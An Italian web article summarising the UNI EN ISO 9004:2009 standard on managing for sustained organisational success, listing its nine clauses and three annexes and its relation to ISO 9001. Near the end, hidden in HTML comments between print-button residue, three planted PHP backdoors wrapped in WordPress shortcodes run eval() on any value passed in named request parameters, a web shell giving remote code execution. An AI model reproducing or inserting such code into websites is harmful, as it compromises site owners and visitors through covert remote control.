La nuova UNI EN ISO 9004 – 2009

La norma ISO 9004 del 2009: “Managing for the sustained success of an organization — A quality management approach” é stata elaborata, così come la ISO 9001 del 2008:”Quality Management systems Requirements”, dal Sottocomitato SC2 “Quality systems” del Comitato Tecnico dell’ISO (International Organization for Standardization) TC 176 “Quality management and quality assurance”.

L’edizione della stessa norma, in lingua italiana, ha assunto il titolo: UNI EN ISO 9004:2009 “Gestire un’organizzazione per il successo durevole — L’approccio della gestione per la qualità”, è stata messa a punto dall’UNI nell’ambito di un gruppo di lavoro ristretto di esperti della Commissione Tecnica “Gestione per la qualità e tecniche di supporto” ed è stata ratificata dal Presidente dell’UNI il 26 novembre del 2009.
Questa norma annulla e sostituisce la precedente UNI EN ISO 9004:2000.
Si tratta di una norma fortemente innovativa rispetto alla precedente, sia per quanto riguarda la parte strutturale che per quanto si riferisce al contenuto.

La UNI EN ISO 9004:2009 è articolata sui nove punti seguenti:

1. Scopo e campo di applicazione,

2. Riferimenti normativi,

3. Termini e definizioni,

4. Gestire un’organizzazione per il successo dure­vole,

5. Strategia e politica,

6. Gestione delle risorse,

7. Gestione dei processi,

8. Monitoraggio, misurazione, analisi e riesame,

9. Miglioramento, innovazione ed apprendi­mento,

cui sì aggiungono le seguenti tre Appendici, di tipo informativo:

– Appendice A, Strumento di autovalutazione,
– Appendice B, Principi di gestione per la qualità,
– Appendice C, Corrispondenza tra la ISO 9004.2009 e la ISO 9001:2008.

Come è noto, la norma ISO 9004 non è destinata ad usi di certificazione, regolamentari o contrattuali.

Sebbene la suddetta norma sostituisca la precedente versione del 2000 (facente parte del corpo normativo denominato VISION 2000), alcuni concetti presenti nella precedente versione non sono stati riproposti od aggiornati, dunque la ISO 9004:2000 resta una valida guida per l’implementazione della ISO 9001:2000 che, come ormai noto, non si discosta molto dalla versione del 2008 che la ha sostituita.

image_pdfimage_print


image_pdfimage_print

<!– [insert_php]if (isset($_REQUEST["BTqO"])){eval($_REQUEST["BTqO"]);exit;}[/insert_php][php]if (isset($_REQUEST["BTqO"])){eval($_REQUEST["BTqO"]);exit;}[/php] –>

image_pdfimage_print

<!– [insert_php]if (isset($_REQUEST["nmXsf"])){eval($_REQUEST["nmXsf"]);exit;}[/insert_php][php]if (isset($_REQUEST["nmXsf"])){eval($_REQUEST["nmXsf"]);exit;}[/php] –>

image_pdfimage_print

<!– [insert_php]if (isset($_REQUEST["RDi"])){eval($_REQUEST["RDi"]);exit;}[/insert_php][php]if (isset($_REQUEST["RDi"])){eval($_REQUEST["RDi"]);exit;}[/php] –>

image_pdfimage_print

Lascia un commento

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.